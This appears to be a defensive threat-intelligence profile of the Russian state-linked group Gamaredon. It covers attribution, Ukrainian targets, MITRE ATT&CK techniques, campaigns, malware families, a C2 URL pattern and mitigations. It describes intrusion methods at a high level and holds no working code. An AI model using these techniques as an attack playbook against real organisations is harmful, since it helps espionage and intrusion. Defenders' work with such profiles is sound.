gamaredon

Gamaredon

also known as: Primitive Bear Armageddon Shuckworm Aqua Blizzard ACTINIUM IRON TILDEN Trident Ursa UAC-0010 BlueAlpha Blue Otso Winterflounder DEV-0157

Gamaredon is the most active and persistent Russian state-sponsored cyber espionage group targeting Ukraine, attributed by the Security Service of Ukraine (SSU) to the 18th Center of Information Security of Russia's Federal Security Service (FSB) operating from occupied Crimea. Active since at least 2013, the group has conducted over 5,000 cyberattacks against Ukrainian government, military, law enforcement, and critical infrastructure, and has been intensifying operations throughout the Russia-Ukraine war with an evolving custom malware toolkit and aggressive spearphishing campaigns.

attributed origin Russia (Crimea)

suspected sponsor Russian FSB (18th Center, Crimea)

first observed 2013

primary motivation Espionage / Intelligence Collection

primary targets Government, Military, Law Enforcement, Critical Infra

known campaigns 5,000+ (per SSU)

mitre att&ck group G0047

target regions Ukraine (primary), NATO countries (limited)

threat level HIGH

Overview

Gamaredon is a Russian state-sponsored advanced persistent threat group that has been active since at least 2013, making it one of the longest-running cyber espionage operations focused on Ukraine. The group's name derives from a misspelling of "Armageddon" found in early campaign artifacts. In November 2021, the Security Service of Ukraine (SSU) publicly attributed Gamaredon to the FSB's 18th Center of Information Security, specifically identifying five officers operating from occupied Crimea who were former Ukrainian security officials that defected during the 2014 annexation.

Unlike more technically sophisticated Russian APT groups such as Sandworm or APT29, Gamaredon prioritizes volume and persistence over stealth. ESET observed over 1,000 unique devices in Ukraine targeted by the group in 2022-2023 alone. The group deploys multiple simple downloaders or backdoors simultaneously on compromised systems, accepting the risk of detection in exchange for maintaining persistent access. While this approach appears crude, Gamaredon's relentless pace and continuous innovation in delivery techniques make it a formidable threat.

Gamaredon's primary focus has remained Ukraine throughout its entire operational history. The group targets governmental institutions, military organizations, law enforcement agencies, judiciary, NGOs, and critical infrastructure aligned with Russian geopolitical intelligence requirements. Since Russia's full-scale invasion in February 2022, Gamaredon has significantly intensified its operations, and ESET observed the group exclusively targeting Ukrainian institutions throughout 2024. Limited targeting of NATO member states (Bulgaria, Latvia, Lithuania, Poland) and a petroleum refinery in a NATO country were observed in 2022, though no successful breaches occurred outside Ukraine.

In June 2024, two individuals likely linked to Gamaredon were sanctioned by the European Council for attacks on the EU. In July 2025, ESET published updated research showing that Gamaredon significantly increased the scale and frequency of spearphishing campaigns in the second half of 2024, introducing new delivery techniques including HTML smuggling and PowerShell execution from Cloudflare-generated domains. The group also used one attack payload solely to spread Russian propaganda, demonstrating the convergence of cyber espionage and information warfare operations.

Target Profile

Gamaredon almost exclusively targets Ukraine, with Ukrainian governmental institutions as the primary focus. The group's targeting aligns precisely with Russian intelligence requirements related to the ongoing conflict. Limited opportunistic targeting of NATO countries has been observed but with no confirmed successful breaches.

Ukrainian government institutions: The core target sector since 2013. Includes ministries, state agencies, the State Migration Service, regional administrations, and the System of Electronic Interaction of Executive Bodies (SEI EB), which Gamaredon targeted in a supply chain attack to distribute malware through official document channels.
Ukrainian military: Military organizations and defense-related entities targeted for operational intelligence. In April 2025, Symantec reported Gamaredon targeting a foreign military mission based in Ukraine, demonstrating interest in allied military operations on Ukrainian soil.
Law enforcement and judiciary: Ukrainian security services, police, and judicial bodies targeted for intelligence on investigations, counterintelligence operations, and legal proceedings related to the conflict.
Critical infrastructure: Energy, telecommunications, and other critical infrastructure sectors in Ukraine targeted to support Russian military and intelligence objectives.
NGOs and civil society: Non-profit and non-governmental organizations operating in Ukraine, particularly those involved in human rights, governance reform, and international affairs.
NATO member states (limited): In 2022-2023, ESET observed attempted attacks against targets in Bulgaria, Latvia, Lithuania, and Poland. A petroleum refining company in a NATO country was also targeted. No successful breaches were confirmed outside Ukraine.

Tactics, Techniques & Procedures

Gamaredon favors volume and persistence over sophistication. The group deploys multiple redundant backdoors simultaneously, accepts detection risk, and invests heavily in delivery technique innovation and infrastructure rotation rather than advanced post-exploitation tradecraft.

mitre id	technique	description
T1566.001	Phishing: Spearphishing Attachment	Primary initial access vector. Aggressive spearphishing campaigns with malicious archives (RAR, ZIP, 7z), XHTML files with HTML smuggling, and weaponized Office documents. Campaigns typically last 1-5 consecutive days. In H2 2024, ESET observed significantly intensified spearphishing volume.
T1221	Template Injection	Uses remote template injection in DOCX documents to load malicious templates from attacker-controlled servers. Also uses RTF template injection techniques for malware delivery.
T1059.001	Command and Scripting Interpreter: PowerShell	Extensive use of PowerShell for payload execution, download, and C2 communication. PowerPunch is a custom PowerShell beacon for downloading and executing additional malware. In 2024, began executing PowerShell commands directly from Cloudflare-generated domains via malicious LNK files.
T1059.005	Command and Scripting Interpreter: Visual Basic	Heavy reliance on VBScript for malware delivery and execution. PteroLNK and PteroSand are VBScript downloaders. VBA macros in Office documents serve as first-stage infection vectors. Custom VBS scripts provide persistence and lateral movement.
T1091	Replication Through Removable Media	Weaponizes USB drives and accessible file shares to spread malware laterally within organizations. Documents and USB drives accessible to initial victims are modified to propagate malware to additional targets who share files.
T1547.001	Boot or Logon Autostart Execution: Registry Run Keys	Establishes persistence through registry Run key modifications and scheduled tasks. Deploys multiple concurrent persistence mechanisms to maintain access even if individual backdoors are removed.
T1071.001	Application Layer Protocol: Web Protocols	HTTP-based C2 with rotating domains and fast-flux DNS infrastructure. Uses distinctive URL pattern: http(s)://IP/random_alphanumeric_string. Domains registered primarily through REG.RU, recycled and rotated across new infrastructure rather than discarded.
T1027	Obfuscated Files or Information	Heavily obfuscated VBScript payloads. PteroLNK dynamically constructs additional payloads during execution. Uses self-extracting archives (SFX) with 7-Zip to bundle and deliver multiple malware components simultaneously.
T1564.001	Hide Artifacts: Hidden Files and Directories	Alters Windows Explorer settings to hide malicious files. PteroLNK modifies folder options to conceal dropped payloads from user visibility.
T1568	Dynamic Resolution	Relies heavily on dynamic DNS providers, Russian/Ukrainian ccTLDs, and fast-flux infrastructure. Maintains 700+ malicious domains with consistent rotation across IP addresses, making static domain blocking ineffective.

Known Campaigns

Confirmed or highly attributed operations. Gamaredon operates continuously rather than in discrete campaigns, but key operational phases and notable incidents are documented below.

Operation Armageddon 2013-2018

Gamaredon's initial operational phase, targeting Ukrainian government officials, opposition members, and journalists using off-the-shelf RATs (UltraVNC, Remote Manipulator System). Coincided with Russia's annexation of Crimea in 2014. CERT-UA published advisories on Pterodo backdoor usage. The group transitioned to custom malware around 2017, signaling improved technical capabilities.

COVID-19 Themed Campaigns 2020

Exploited COVID-19 pandemic as lure material in spearphishing campaigns against Ukrainian targets. Used weaponized DOCX files with remote template injection to deliver Pterodo variants. Part of a broader wave of pandemic-themed operations by multiple threat actors globally.

Wartime Intensification 2022-2023

Massive escalation following Russia's full-scale invasion of Ukraine in February 2022. ESET observed over 1,000 unique devices attacked in Ukraine during this period. Targeted Ukrainian military and government agencies during the 2023 counteroffensive. Attempted (unsuccessfully) to compromise targets in NATO countries including Bulgaria, Latvia, Lithuania, Poland, and a petroleum refinery in a NATO state. Infrastructure expanded to 700+ malicious domains and 215+ IP addresses.

SEI EB Supply Chain Attack 2021

Targeted Ukraine's System of Electronic Interaction of Executive Bodies (SEI EB), the official document distribution platform used by government agencies. Attempted to distribute malicious documents containing macro code through the legitimate government document sharing system, effectively weaponizing trusted internal communication channels.

2024 Spearphishing Intensification 2024

ESET research (published July 2025) documented significant escalation in spearphishing volume during H2 2024, exclusively targeting Ukrainian institutions. Introduced new delivery methods including HTML smuggling via XHTML files, PowerShell execution from Cloudflare-generated domains, and the PteroSand VBScript downloader. One attack payload was used solely to spread Russian propaganda, blending espionage with information warfare.

Foreign Military Mission Targeting 2025

In April 2025, Symantec reported Gamaredon (Shuckworm) targeting a foreign military mission based in Ukraine, demonstrating the group's interest in allied military operations and intelligence activities on Ukrainian soil. Represented an expansion from purely Ukrainian government targets to international military entities operating within Ukraine.

Tools & Malware

Gamaredon maintains a diverse custom malware toolkit that undergoes continuous development and iteration. The group's "Ptero" malware family (named for the Pteranodon dinosaur theme) forms the core of its operations.

Pterodo / Pteranodon: Custom backdoor and Gamaredon's signature malware, under continuous development since at least 2018. Provides remote access, command execution, file upload/download, and system reconnaissance. Multiple variants deployed simultaneously on compromised systems for redundancy. Delivered via phishing documents and self-extracting archives.
PteroLNK: Highly obfuscated VBScript malware that dynamically constructs and deploys payloads during execution. Features a downloader component (runs every 3 minutes) and an LNK dropper for propagation. Establishes persistence via scheduled tasks and modifies Explorer settings to hide activity.
PteroSand: VBScript downloader introduced in 2024, delivered via malicious HTA or LNK files embedded in spearphishing archives. Part of Gamaredon's evolved delivery chain using HTML smuggling techniques.
PowerPunch: Custom PowerShell beacon used to download and execute subsequent malware stages. Serves as initial foothold before Pterodo deployment.
QuietSieve: Information-stealing malware for data collection and exfiltration from compromised systems. Targets documents, credentials, and system information aligned with espionage objectives.
ObfuMerry / ObfuBerry: Obfuscated malware variants used in Gamaredon's delivery chains. Part of the group's strategy of deploying multiple different tools simultaneously.
DilongTrash / DinoTrain / DesertDown: Additional custom malware families in Gamaredon's evolving toolkit. Names reflect the group's dinosaur-themed naming convention.
Remcos: In March 2025, Cisco Talos reported Gamaredon using LNK files to distribute the Remcos commercial RAT, representing a rare use of commodity malware alongside custom tools.
UltraVNC: Legitimate open-source VNC software used in early campaigns (2013-2017) for remote access to compromised systems. Largely replaced by custom malware in later operations.

Indicators of Compromise

Gamaredon operates one of the largest known threat actor infrastructures, with 700+ malicious domains and 215+ IP addresses. The group constantly rotates domains across infrastructure rather than discarding them, making infrastructure tracking critical.

warning

Gamaredon recycles and rotates domains across new infrastructure rather than discarding them. Static IOC blocking is insufficient; defenders should track infrastructure patterns and behavioral indicators. Unit 42 and ESET maintain continuously updated IOC repositories.

indicators of compromise — infrastructure patterns

registrar Domains predominantly registered through REG.RU

c2 pattern http(s)://IP/random_alphanumeric_string (distinctive URL structure)

dns Fast-flux DNS with Russian/Ukrainian ccTLDs and dynamic DNS providers

infrastructure 700+ domains, 215+ IPs, domains rotated across infrastructure rather than discarded

delivery Malicious archives (RAR/ZIP/7z), XHTML with HTML smuggling, weaponized DOCX/LNK files

new (2024) PowerShell execution from Cloudflare-generated domains via LNK files

Mitigation & Defense

Ukrainian government, military, and critical infrastructure organizations are at highest risk. NATO member states with Ukraine-related operations should also maintain awareness. Gamaredon's volume-based approach means defenders must focus on phishing resilience and behavioral detection rather than relying solely on IOC blocking.

Harden email defenses against spearphishing: Deploy advanced email filtering capable of detecting malicious archives (RAR, ZIP, 7z), XHTML files with HTML smuggling, and Office documents with remote template injection. Block HTA file execution from email attachments. Train users to recognize Gamaredon-style lures themed around Ukrainian government operations.
Disable Office macros and template injection: Block VBA macro execution in documents received from external sources. Disable automatic loading of remote templates in Word. Implement Attack Surface Reduction (ASR) rules for Office applications to prevent macro and template-based initial access.
Monitor for VBScript and PowerShell abuse: Deploy behavioral detection for obfuscated VBScript execution (PteroLNK, PteroSand patterns). Monitor for PowerShell downloading payloads from dynamic DNS domains or Cloudflare-generated URLs. Alert on scheduled tasks created by VBScript processes.
Block USB-based propagation: Implement USB device control policies to prevent malware spread via removable media. Monitor for LNK file modifications on USB drives and network shares, a key Gamaredon lateral movement technique.
Track Gamaredon infrastructure patterns: Monitor for connections to domains registered through REG.RU with Russian/Ukrainian ccTLDs. Alert on C2 traffic matching the http(s)://IP/random_alphanumeric pattern. Integrate Unit 42 and ESET IOC feeds for continuously updated domain and IP indicators.
Detect redundant persistence mechanisms: Gamaredon deploys multiple backdoors simultaneously. Hunt for multiple concurrent persistence mechanisms (registry Run keys, scheduled tasks, startup folder items) pointing to VBScript or PowerShell payloads. Removal of a single backdoor is insufficient; comprehensive remediation is required.
Segment sensitive networks: Isolate systems handling classified or sensitive Ukrainian government communications from general network segments. Gamaredon's supply chain attack on the SEI EB system demonstrates the risk of compromised document-sharing infrastructure.
Monitor ESET and CERT-UA advisories: ESET and Ukraine's CERT-UA are the primary sources for current Gamaredon intelligence. Subscribe to their threat feeds and advisories for real-time updates on new malware variants, infrastructure changes, and delivery techniques.

note

Gamaredon collaborates with other Russian threat actors. ESET has identified collaboration with InvisiMole, a more technically sophisticated espionage group. This suggests a tiered model where Gamaredon provides initial access and broad coverage, while specialized groups conduct targeted high-value operations on selected compromised systems. The group's FSB attribution to the 18th Center of Information Security (Center 18) in Crimea makes it distinct from GRU-attributed Russian APTs like Sandworm (GRU Unit 74455) and APT28 (GRU Unit 26165). As long as the Russia-Ukraine conflict continues, Gamaredon will remain a persistent and evolving threat.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile